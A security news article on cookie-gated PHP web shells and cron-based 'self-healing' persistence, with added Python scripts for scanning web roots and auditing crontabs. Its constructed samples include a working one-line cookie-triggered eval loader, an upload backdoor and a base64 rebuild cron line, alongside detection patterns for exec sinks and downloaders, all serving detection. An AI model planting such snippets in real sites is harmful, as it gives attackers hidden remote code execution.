Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers in order to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team.
“Instead of exposing command execution via URL parameters or request bodies, these web shells rely on cookie values supplied by the threat actor to gate execution, pass instructions, and activate malicious functionality,” the tech giant said.
This approach provides additional stealth: the malicious code remains dormant during normal application execution, and the web shell logic activates only when specific cookie values are present. Microsoft noted that this dormant-until-triggered behavior holds across web requests, scheduled tasks, and trusted background workers.
The technique takes advantage of the fact that cookie values are available at runtime through the $_COOKIE superglobal, so the attacker's input can be consumed without any additional parsing. It is also unlikely to raise red flags: cookies blend into normal web traffic, and because the default access-log formats of common web servers record the request line but not the Cookie header, the command channel leaves far less of a trace than commands passed in URL parameters would.
The cookie-controlled execution model comes in several implementations:
- A PHP loader that uses multiple layers of obfuscation and runtime checks before parsing structured cookie input to execute the encoded secondary payload.
- A PHP script that splits the structured cookie data to reconstruct operational components such as file handling and decoding functions, and conditionally writes a secondary payload to disk and executes it.
- A PHP script that uses a single cookie value as a marker to trigger threat actor-controlled actions, including execution of supplied input and file uploads.
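As an added illustration, not code from Microsoft's report or from the page, the following Python script implements the kind of static triage a responder would run over a web root to find the pattern described above: it flags PHP files in which `$_COOKIE` input co-occurs with execution or file-write sinks, payload decoders, a cookie-keyed conditional, or common obfuscation. The three PHP snippets embedded at the bottom are constructed samples, and the sink, decoder and obfuscation lists are the editor's choices, not an exhaustive signature set.

```python
"""Static triage of PHP files for the cookie-gated execution pattern.
File-level heuristics, not taint tracking: a file is flagged when $_COOKIE
input co-occurs with execution, file-write or decoding functions. Treat hits
as leads for manual review. The PHP snippets below are constructed samples.
"""
import os
import re
import tempfile

# Functions that turn attacker-controlled strings into code, commands or files.
SINKS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|"
    r"create_function|call_user_func(?:_array)?|file_put_contents|"
    r"move_uploaded_file|include(?:_once)?|require(?:_once)?)\s*[(\$'\"]")
# Functions used to unwrap an encoded secondary payload before it reaches a sink.
DECODERS = re.compile(
    r"\b(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13|strrev|"
    r"hex2bin|convert_uudecode)\s*\(")
COOKIE = re.compile(r"\$_COOKIE\b")
# A cookie value used as the condition that decides whether anything runs at all.
GATE = re.compile(r"(?:isset|empty|array_key_exists)\s*\(\s*\$_COOKIE"
                  r"|\$_COOKIE\s*\[[^\]]*\]\s*(?:===?|!==?)")
OBFUSCATION = {  # cheap indicators of a wrapped or hidden payload (editor's choices)
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{60,}={0,2}"),
    "chr_concat": re.compile(r"(?:chr\s*\(\s*\d+\s*\)\s*\.?\s*){4,}"),
    "hex_escapes": re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}"),
    "variable_variables": re.compile(r"\$\$\w+"),
}
PHP_EXT = (".php", ".phtml", ".php5", ".php7", ".inc")

def triage(src):
    """Score one PHP source string; returns the matched indicators and a verdict."""
    cookie = bool(COOKIE.search(src))
    sinks = sorted(set(SINKS.findall(src)))
    decoders = sorted(set(DECODERS.findall(src)))
    gate = bool(GATE.search(src))
    obf = sorted(tag for tag, rx in OBFUSCATION.items() if rx.search(src))
    score = 3 * len(sinks) + 2 * len(decoders) + 2 * len(obf) + (1 if gate else 0)
    if cookie and sinks:
        verdict = "suspicious"   # cookie input and a code/command/file sink in one file
    elif cookie and (decoders or obf):
        verdict = "review"       # cookie input next to payload decoding or obfuscation
    elif sinks and decoders:
        verdict = "review"       # classic eval(base64_decode(...)) without a cookie gate
    else:
        verdict = "clean"
    return {"cookie": cookie, "gate": gate, "sinks": sinks, "decoders": decoders,
            "obfuscation": obf, "score": score, "verdict": verdict}

def scan_dir(root):
    """Triage every PHP file under root; returns non-clean hits, highest score first."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = triage(fh.read())
            except OSError:
                continue
            if result["verdict"] != "clean":
                hits.append((path, result))
    hits.sort(key=lambda hit: hit[1]["score"], reverse=True)
    return hits

# Constructed samples: a legitimate cookie read, a cookie-gated loader that decodes
# and evals the cookie value, and a marker cookie that switches on an upload handler.
BENIGN = """<?php
$lang = isset($_COOKIE['lang']) ? $_COOKIE['lang'] : 'en';
if (!in_array($lang, ['en', 'de', 'fr'], true)) { $lang = 'en'; }
echo htmlspecialchars($lang);
"""
LOADER = """<?php
if (isset($_COOKIE['xs'])) {
    @eval(gzinflate(base64_decode(strrev($_COOKIE['xs']))));
}
"""
MARKER = """<?php
if (@$_COOKIE['m'] == 'u' && isset($_FILES['f'])) {
    move_uploaded_file($_FILES['f']['tmp_name'], $_POST['p']);
}
"""

def demo():
    """Write the samples to a temp dir, scan it, and return [(file, verdict)]."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in (("lang.php", BENIGN), ("cache.php", LOADER), ("up.php", MARKER)):
            with open(os.path.join(tmp, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return [(os.path.basename(p), r["verdict"]) for p, r in scan_dir(tmp)]
```

Call `scan_dir("/var/www")` (or the hosting account's document root) and review the hits from the top; `demo()` runs the same scan over the constructed samples, which yields the loader and the upload handler as suspicious and leaves the language-preference file alone. Because the match is per file rather than per data flow, a framework file that legitimately reads cookies and also calls `include` will surface too; the score ordering exists to push the obvious loaders to the top of a long list.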
In at least one case, threat actors gained initial access to a victim's hosted Linux environment, either by exploiting a known security vulnerability or by using legitimate credentials, and then set up a cron job that periodically invokes a shell routine to execute an obfuscated PHP loader.
This “self-healing” architecture allows the PHP loader to be repeatedly rebuilt by a scheduled task, even if it is removed as part of cleanup and remediation efforts, creating a reliable and persistent remote code execution channel. Once the PHP loader is deployed, it remains dormant during normal traffic and springs into action when it receives HTTP requests with specific cookie values.
“By transferring execution control to cookies, the web shell can remain hidden from normal traffic, activating only during intentional interactions,” Microsoft said. “By separating persistence through cron-based re-builds from execution control via cookie-gated activation, the threat actor reduced operational noise and limited observable indicators in regular application logs.”
A common aspect that ties all the above implementations together is the use of obfuscation to hide sensitive functionality and cookie-based gating to initiate malicious actions while leaving a minimal interactive footprint.
To counter the threat, Microsoft recommends:
- implementing multi-factor authentication for hosting control panels, SSH access, and administrative interfaces;
- monitoring for unusual login activity;
- restricting execution of shell interpreters;
- auditing cron jobs and scheduled tasks on web servers;
- checking for suspicious file creation in web directories; and
- limiting the shell capabilities of the hosting control panel.
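The cron-based rebuild loop described earlier and two of these recommendations (auditing cron jobs, checking for suspicious file creation in web directories) can be turned into a quick host triage. The following Python script is an added example, not tooling from Microsoft or from the page: it parses crontab entries and flags those that combine several indicators (a high-frequency schedule, an interpreter, a web-root path, a hidden or temp-dir file, an inline decode or download), and it lists PHP files under a web root whose mtime or ctime is recent. The crontab lines in SAMPLE_CRON are constructed for the demo, and the indicator list and the two-indicator threshold are the editor's assumptions.

```python
"""Audit cron entries for the "self-healing" rebuild loop and list recently
written PHP files under a web root. Heuristic triage for manual review.
The crontab lines in SAMPLE_CRON are constructed for the demo, not a capture.
"""
import os
import re
import tempfile
import time

WEB_ROOTS = r"/var/www|/home/[^/\s]+/public_html|/usr/share/nginx|/srv/www"
# Indicators checked against the command part of each cron entry (editor's choices).
CHECKS = {
    "interpreter":        re.compile(r"(?:^|[\s;|&/])(?:php\d*|sh|bash|dash|perl|python[23]?)\b"),
    "downloader":         re.compile(r"\b(?:curl|wget)\b"),
    "inline-decode":      re.compile(r"base64\s+(?:-d|--decode)|base64_decode|\beval\b|\|\s*(?:sh|bash)\b"),
    "web-root":           re.compile(WEB_ROOTS),
    "hidden-or-tmp-path": re.compile(r"/\.[^/\s]+|/tmp/|/var/tmp/|/dev/shm/"),
}

def split_cron(line, system_format):
    """Return (schedule, user, command), or None for comments, blanks and VAR=... lines.
    system_format=True for /etc/crontab and /etc/cron.d, which carry a user field."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"\w+=", line):
        return None
    tokens = line.split()
    n = 1 if tokens[0].startswith("@") else 5        # @reboot-style keyword or 5 fields
    skip = n + (1 if system_format else 0)
    if len(tokens) <= skip:
        return None
    user = tokens[n] if system_format else None
    return " ".join(tokens[:n]), user, " ".join(tokens[skip:])

def high_frequency(schedule, threshold=15):
    """True for a '*' or '*/N' (N <= threshold) minute field: the cadence of a rebuild loop."""
    minute = schedule.split()[0]
    m = re.fullmatch(r"\*/(\d+)", minute)
    return minute == "*" or (m is not None and int(m.group(1)) <= threshold)

def audit_cron(lines, system_format=False, min_reasons=2):
    """Return [(schedule, user, command, reasons)] for entries with >= min_reasons
    indicators. Two keeps one-off matches (a plain backup script) out of the list."""
    hits = []
    for line in lines:
        parsed = split_cron(line, system_format)
        if parsed is None:
            continue
        schedule, user, command = parsed
        reasons = [tag for tag, rx in CHECKS.items() if rx.search(command)]
        if high_frequency(schedule):
            reasons.append("high-frequency")
        if len(reasons) >= min_reasons:
            hits.append((schedule, user, command, reasons))
    return hits

def recent_php_files(root, hours=24, now=None):
    """PHP files under root created or changed within `hours`. ctime is checked as
    well as mtime because `touch -r` can backdate mtime but not ctime."""
    cutoff = (time.time() if now is None else now) - hours * 3600
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
            except OSError:
                continue
            if max(st.st_mtime, st.st_ctime) >= cutoff:
                found.append(path)
    return sorted(found)

# Constructed user crontab (no user field): one decode-and-write rebuild loop,
# one loader invocation, and two ordinary jobs that should not be flagged.
SAMPLE_CRON = """# constructed sample for the demo
MAILTO=""
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /bin/sh -c "echo UEhQX0xPQURFUg== | base64 -d > /var/www/html/.cache.php"
*/10 * * * * php /var/www/html/wp-content/uploads/.x.php
@reboot /usr/local/bin/backup.sh
""".splitlines()

def demo_recent():
    """Temp web root with one fresh PHP file and one text file: (fresh hits, stale hits)."""
    with tempfile.TemporaryDirectory() as tmp:
        for name in ("index.php", "notes.txt"):
            open(os.path.join(tmp, name), "w").close()
        fresh = [os.path.basename(p) for p in recent_php_files(tmp, hours=1)]
        stale = recent_php_files(tmp, hours=1, now=time.time() + 7200)
        return fresh, stale
```

On a live host, feed `audit_cron` the lines of `/etc/crontab` and each file under `/etc/cron.d` with `system_format=True`, and the per-user files under `/var/spool/cron` (or `/var/spool/cron/crontabs` on Debian-based systems) with `system_format=False`; scripts dropped into `/etc/cron.hourly` and friends, and systemd timers, are not crontab syntax and need a separate look. In the constructed sample, the two `*/5` and `*/10` entries are returned with their indicator tags, while the certbot and backup jobs are not. Pair the cron hits with `recent_php_files(docroot)`: a loader that a cron job keeps rewriting shows up with a ctime that keeps moving even after it has been deleted and "cleaned up".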
"Continued use of cookies as a control mechanism suggests the reuse of established web shell tradecraft," Microsoft said. "By moving control logic into cookies, threat actors enable persistent post-compromise access that can evade many traditional inspection and logging controls."
“Instead of relying on complex exploit chains, the threat actor took advantage of legitimate execution paths already present in the environment, including web server processes, control panel components, and cron infrastructure, to stage and protect the malicious code.”